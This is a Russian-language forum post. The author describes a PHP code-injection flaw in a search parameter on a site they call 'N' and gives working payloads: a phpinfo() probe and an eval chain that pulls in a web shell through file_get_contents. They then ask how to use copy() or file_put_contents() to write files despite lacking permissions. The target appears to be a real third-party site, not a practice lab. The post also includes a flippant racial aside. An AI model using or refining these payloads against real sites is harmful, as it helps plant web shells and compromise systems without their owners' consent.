Имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo. В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.

И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!